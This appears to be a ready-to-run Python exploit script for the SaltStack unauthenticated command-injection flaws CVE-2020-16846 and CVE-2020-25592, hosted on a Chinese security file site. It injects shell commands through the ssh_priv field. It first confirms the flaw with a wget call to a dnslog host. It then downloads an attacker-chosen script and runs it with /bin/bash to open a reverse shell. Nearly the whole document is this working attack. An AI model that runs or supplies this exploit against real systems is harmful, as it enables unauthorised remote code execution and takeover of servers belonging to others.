menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592 chevron_right SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592.py
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592.py
    5.47 KB / 2021-07-04 06:01:08
        import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')
    print('+  \033[34mVersion: SaltStack Version < 2019.2.4 & < 3000.2                   \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
    print('+  \033[36mDnslog      >>> xxx.dnslog.cn                                     \033[0m')
    print('+  \033[36mFile_addr   >>> http://xxx.xxx.xxx/cmd.sh                         \033[0m')
    print('+  \033[36mFile_name   >>> cmd.sh                                             \033[0m')
    print('+------------------------------------------')


def POC_1(target_url, dnslog):
    vuln_url = target_url + "/run"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "application/x-yaml",
        "Accept-Language": "en-US,en;q=0.5"
    }
    data = "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=peiqi|wget http://{}".format(dnslog)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
        print("\033[32m[o] 正在执行 wget http://{} \033[0m".format(dnslog))
        if "return" in response.text and response.status_code == 200:
            print("\033[32m[o] 请查看 Dnslog响应 \033[0m")
            while True:
                Chois = input("\033[35m是否反弹 Shell(Y/N) >>> \033[0m")
                if Chois == "Y" or Chois == "y":
                    File_addr = input("\033[35mFile_addr >>> \033[0m")
                    File_name = input("\033[35mFile_name >>> \033[0m")
                    POC_2(target_url, File_addr, File_name)
                else:
                    sys.exit(0)
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


def POC_2(target_url, File_addr, File_name):
    vuln_url = target_url + "/run"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "application/x-yaml",
        "Accept-Language": "en-US,en;q=0.5"
    }
    data = "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=peiqi|wget {}".format(File_addr)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
        print("\033[32m[o] 正在执行 wget {} \033[0m".format(File_addr))
        if "return" in response.text and response.status_code == 200:
            print("\033[32m[o] 成功下载{} \033[0m".format(File_addr))
            POC_3(target_url, File_name)
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


def POC_3(target_url, File_name):
    vuln_url = target_url + "/run"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "application/x-yaml",
        "Accept-Language": "en-US,en;q=0.5"
    }
    data = "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=peiqi|/bin/bash {}".format(File_name)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
        print("\033[32m[o] 正在执行 /bin/bash \033[0m".format(File_name))
        if "return" in response.text and response.status_code == 200:
            print("\033[32m[o] 命令执行完毕,请查看是否反弹Shell \033[0m".format(File_name))
            sys.exit(0)
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[32m[o] 命令执行成功 \033[0m")
        sys.exit(0)


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    dnslog = str(input("\033[35mDnslog >>> \033[0m"))
    POC_1(target_url, dnslog)
    links
    file_download